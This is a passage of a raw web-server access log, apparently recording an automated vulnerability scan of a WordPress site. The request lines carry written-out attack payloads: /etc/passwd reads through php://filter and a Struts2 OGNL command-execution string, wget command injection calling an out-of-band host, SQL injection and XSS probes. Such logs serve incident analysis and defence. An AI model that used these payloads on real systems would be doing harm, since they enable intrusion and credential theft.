HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:00:28:45 -0400] "GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.65" 154.84.62.234 - - [24/Apr/2025:00:29:42 -0400] "GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.7.18" 154.84.62.234 - - [24/Apr/2025:00:30:55 -0400] "GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:00:32:20 -0400] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:32:20 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:00:37:38 -0400] "POST /_search?pretty HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.7 (KHTML, like Gecko) Version/17.3.74 Safari/617.7" 154.84.62.234 - - [24/Apr/2025:00:38:02 -0400] "GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.2; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:00:38:02 -0400] "GET /dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.17" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.26" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:39:45 -0400] "GET /wp-content/plugins/uploader/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.22" 154.84.62.234 - - [24/Apr/2025:00:39:47 -0400] "GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.25" 154.84.62.234 - - [24/Apr/2025:00:40:33 -0400] "GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.63" 154.84.62.234 - - [24/Apr/2025:00:40:35 -0400] "GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:42:41 -0400] "GET /backupmgt/localJob.php?session=fail;wget+http://d04qr7ij4pq19d75k490p3qa69wwcio51.oast.online; HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.34" 154.84.62.234 - - [24/Apr/2025:00:42:44 -0400] "GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://d04qr7ij4pq19d75k490prgm5h7iwkd8g.oast.online; HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.25" 154.84.62.234 - - [24/Apr/2025:00:43:30 -0400] "POST /?q=node&destination=node HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:52:26 -0400] "POST /webadmin/auth/verification.php HTTP/1.1" 200 0 "https://mgrokokbet.id/webadmin/start/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:00:54:08 -0400] "GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.79" 77.111.245.12 - - [24/Apr/2025:00:56:25 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:00:56:27 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 154.84.62.234 - - [24/Apr/2025:00:58:44 -0400] "GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:00:58:46 -0400] "GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.5.19" 154.84.62.234 - - [24/Apr/2025:00:59:21 -0400] "POST /website/blog/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:59:22 -0400] "POST /_search HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 HeyTapBrowser/45.11.0.1.1 Chrome/91.0.4472.88" 154.84.62.234 - - [24/Apr/2025:01:00:24 -0400] "POST /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:00:31 -0400] "GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:01:01 -0400] "GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:01:01:02 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:01:02:11 -0400] "POST /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/8.0.0 Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:01:03:08 -0400] "POST /cgibin/webproc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.79" 154.84.62.234 - - [24/Apr/2025:01:03:09 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:04:37 -0400] "GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:01:07:34 -0400] "GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:01:07:56 -0400] "PUT /_snapshot/test HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:08:00 -0400] "PUT /_snapshot/test2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 77.111.245.12 - - [24/Apr/2025:01:08:49 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:09:03 -0400] "POST /login.php HTTP/1.1" 200 0 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:09:05 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:09:42 -0400] "POST /login.php HTTP/1.1" 200 0 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:09:47 -0400] "POST /login.php HTTP/1.1" 200 0 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:10:14 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:10:20 -0400] "POST /login.php HTTP/1.1" 200 0 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:10:29 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:10:36 -0400] "POST /login.php HTTP/1.1" 200 0 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 154.84.62.234 - - [24/Apr/2025:01:11:00 -0400] "GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 77.111.245.12 - - [24/Apr/2025:01:12:35 -0400] "POST /login.php HTTP/1.1" 200 0 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:13:23 -0400] "GET /?ND HTTP/1.1" 200 0 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 154.84.62.234 - - [24/Apr/2025:01:14:05 -0400] "GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:14:06 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 102.164.97.24 - - [24/Apr/2025:01:14:53 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.24 - - [24/Apr/2025:01:14:54 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 77.111.245.12 - - [24/Apr/2025:01:15:10 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:15:16 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:15:31 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:15:51 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:16:12 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.24 - - [24/Apr/2025:01:16:31 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.24 - - [24/Apr/2025:01:16:46 -0400] "GET /info.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.24 - - [24/Apr/2025:01:18:16 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:22:06 -0400] "GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:22:06 -0400] "GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:23:01 -0400] "GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:23:01 -0400] "GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:01:23:01 -0400] "GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:01:23:34 -0400] "GET /wp-content/plugins/e-search/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:01:23:34 -0400] "GET /wp-content/plugins/e-search/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:27:22 -0400] "GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.1) AppleWebKit/616.8 (KHTML, like Gecko) Version/17.2.12 Safari/616.8" 154.84.62.234 - - [24/Apr/2025:01:29:47 -0400] "GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 154.84.62.234 - - [24/Apr/2025:01:29:48 -0400] "GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:01:31:13 -0400] "GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:32:58 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:32:58 -0400] "GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.54" 154.84.62.234 - - [24/Apr/2025:01:34:29 -0400] "GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:34:29 -0400] "GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:01:34:29 -0400] "GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:34:29 -0400] "GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:01:34:29 -0400] "GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:34:29 -0400] "GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:01:34:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:34:30 -0400] "GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:36:12 -0400] "GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.18" 102.164.97.24 - - [24/Apr/2025:01:36:18 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.24 - - [24/Apr/2025:01:38:07 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:40:08 -0400] "GET / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:01:40:09 -0400] "GET /?author=1 HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:01:40:24 -0400] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:01:41:00 -0400] "GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.7.24" 154.84.62.234 - - [24/Apr/2025:01:42:35 -0400] "POST /boardDataWW.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:43:43 -0400] "GET /wp-content/plugins/whizz/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:01:43:43 -0400] "GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:01:44:31 -0400] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:01:47:07 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" 154.84.62.234 - - [24/Apr/2025:01:47:18 -0400] "GET /BSW_cxttongr.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_8; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:01:47:18 -0400] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:01:50:16 